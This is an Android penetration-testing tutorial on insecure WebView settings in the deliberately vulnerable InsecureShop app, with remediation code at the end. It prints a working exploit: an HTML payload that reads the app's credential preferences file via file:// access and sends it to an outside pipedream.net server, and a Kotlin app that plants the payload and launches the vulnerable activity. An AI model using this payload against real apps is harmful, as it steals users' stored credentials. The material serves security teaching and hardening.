Android Penetration Testing
Vulnerability #12: Insecure Webview Properties Enabled


Last updated 1 year ago

The WebView class is an extension of Android's View class that lets you display web pages as part of your activity layout. Note that a WebView is not a fully fledged browser: it only renders a web page inside the activity, and it does so in the app's own process, with the app's permissions and access to the app's private files. In our target application, three activities use WebViews:

  • com.insecureshop.WebViewActivity

  • com.insecureshop.WebView2Activity

  • com.insecureshop.PrivateActivity

WebViews are used in most Android apps, but misconfiguration of these components can lead to dangerous vulnerabilities. Let's analyze some of the WebView settings in

This configuration is dangerous: combining javaScriptEnabled = true with allowUniversalAccessFromFileURLs = true in an activity that loads an arbitrary, attacker-supplied URL lets a page loaded from a file:// URL read any file the app itself can read. With that setting, JavaScript running on a file:// origin may issue XMLHttpRequests to any other origin, including other file:// paths such as the app's private shared_prefs directory, so the page can read those files and send them off-device:

pwned.html

<html>
    <head>
    </head>
    <body>
        <script type="text/javascript">
            // Read a local file through the WebView. This only works because the
            // target activity enables allowUniversalAccessFromFileURLs and loads
            // this page from a file:// URL, so file:// XHRs are not blocked.
            function exfiltrateFile(path, callback) {
              var req = new XMLHttpRequest();

              req.open("GET", "file://" + path, true);
              //req.overrideMimeType("text/xml");
              req.onload = function(e) {
                /* debug output; as an attacker you would want to do this silently
                document.write("did we receive the file?");
                document.write(req.responseText);
                */
                callback(btoa(req.responseText));
              }
              req.onerror = function(e) {
                document.write("[-] could not read " + path);
                callback(null);
              }
              req.send();
            }

            // file we need to exfiltrate, contains app credentials
            var file = "/data/user/0/com.insecureshop/shared_prefs/Prefs.xml";

            exfiltrateFile(file, function(contents) {
                if (contents === null) {
                    return; // nothing was read, so there is nothing to send
                }
                var exfil = new XMLHttpRequest();

                // place attacker server here; encodeURIComponent keeps the '+', '/'
                // and '=' characters of the base64 payload intact in the query string
                exfil.open("GET", "https://encn0rhq3ml1a.x.pipedream.net?file=" + encodeURIComponent(contents), true);
                exfil.onload = function(e) {
                    document.write("<br>[+] File successfully exfiltrated to remote server");
                }
                exfil.onerror = function(e) {
                    // the request may still have reached the server even if the
                    // response was rejected by the browser (e.g. missing CORS headers)
                    document.write("<br>[-] Exfiltration request failed");
                }
                exfil.send();
            });
        </script>
    </body>
</html>

The HTML file above reads the contents of the vulnerable application's shared preferences file, which contains the user's credentials, and exfiltrates it to a remote server. The code below writes the payload file to the device's sdcard directory, then starts the vulnerable WebView activity with an explicit intent that points it at the payload file.

MainActivity.kt

import android.content.Intent
import android.os.Bundle
import android.os.Environment
import androidx.appcompat.app.AppCompatActivity
import java.io.File

class MainActivity : AppCompatActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)

        // write pwned.html (bundled in this app's assets/ directory) to a publicly
        // accessible location (e.g. /sdcard). This needs WRITE_EXTERNAL_STORAGE
        // and, on Android 10 and later, legacy external storage access;
        // getExternalStorageDirectory() is deprecated from API 29 but still works.
        val readfile = assets.open("pwned.html").bufferedReader().use { it.readText() }
        val payload = File(Environment.getExternalStorageDirectory().absolutePath, "pwned.html")
        payload.writeText(readfile)

        // start the vulnerable webview with an explicit intent; the "url" extra
        // is the URL the target activity loads, so we point it at our payload
        val exploitIntent = Intent()
        exploitIntent.setClassName("com.insecureshop", "com.insecureshop.WebView2Activity")
        exploitIntent.action = "com.insecureshop.android.WEBVIEW"
        exploitIntent.addCategory("android.intent.category.BROWSABLE")
        exploitIntent.putExtra("url", "file:///sdcard/pwned.html")
        startActivity(exploitIntent)
    }
}

The same payload can be reused against the other WebView activities listed above wherever they enable the same settings and accept an attacker-controlled URL; only the target class name and the intent extras need to change.
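The settings combination discussed above, written out beside a hardened version of the same activity. This is an added example written for this page, not InsecureShop's source code: the class names, the way the `url` extra is handled, the fallback URL and the allow-listed host `shop.example.com` are assumptions for illustration.

```kotlin
import android.content.Intent
import android.net.Uri
import android.os.Bundle
import android.webkit.WebResourceRequest
import android.webkit.WebView
import android.webkit.WebViewClient
import androidx.appcompat.app.AppCompatActivity

// VULNERABLE (reconstructed from the settings named in the text, not InsecureShop's code):
// JavaScript on, universal access from file:// on, and an intent extra loaded unchecked.
class WeakWebViewActivity : AppCompatActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        val webView = WebView(this)
        setContentView(webView)
        webView.settings.javaScriptEnabled = true
        // Lets a file:// page issue XHRs to any origin, including other file:// paths.
        webView.settings.allowUniversalAccessFromFileURLs = true
        // Default is true below API 30, so file:///sdcard/pwned.html is loadable.
        webView.settings.allowFileAccess = true
        webView.webViewClient = WebViewClient()
        // Attacker-controlled if the activity is exported: any app can set this extra.
        intent.getStringExtra("url")?.let { webView.loadUrl(it) }
    }
}

// HARDENED: file/content access off, universal access off, and every navigation
// (initial load, links, redirects) checked against an https host allow-list.
class SafeWebViewActivity : AppCompatActivity() {
    companion object {
        // Assumed allow-list; the only origin this WebView may render.
        private val ALLOWED_HOSTS = setOf("shop.example.com")
        private const val FALLBACK_URL = "https://shop.example.com/"

        // True only for https URLs whose host is on the allow-list. Rejects file://,
        // content://, javascript: and http:// outright, and null/garbage input.
        fun isAllowedUrl(raw: String?): Boolean {
            val uri = raw?.let { Uri.parse(it) } ?: return false
            val host = uri.host?.lowercase() ?: return false
            return uri.scheme.equals("https", ignoreCase = true) && host in ALLOWED_HOSTS
        }
    }

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        val webView = WebView(this)
        setContentView(webView)
        with(webView.settings) {
            javaScriptEnabled = true              // keep on only if the page needs it
            allowFileAccess = false               // no file:// loads at all
            allowContentAccess = false            // no content:// loads either
            allowFileAccessFromFileURLs = false
            allowUniversalAccessFromFileURLs = false
        }
        webView.webViewClient = object : WebViewClient() {
            // Returning true cancels the navigation, so anything off the
            // allow-list (including redirects) is dropped instead of loaded.
            override fun shouldOverrideUrlLoading(view: WebView, request: WebResourceRequest): Boolean =
                !isAllowedUrl(request.url.toString())
        }
        val requested = intent.getStringExtra("url")
        webView.loadUrl(if (isAllowedUrl(requested)) requested!! else FALLBACK_URL)
    }
}
```

Two points go beyond the settings themselves. First, the check is on the parsed scheme and host, not on a string prefix, so inputs like `https://shop.example.com.evil.test/` or `file:///sdcard/pwned.html` fail it. Second, the settings only limit what the WebView does with a URL; if nothing outside the app needs to open the activity, also mark it `android:exported="false"` in the manifest (or drop its intent filter), which removes the attacker's ability to supply the `url` extra in the first place.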
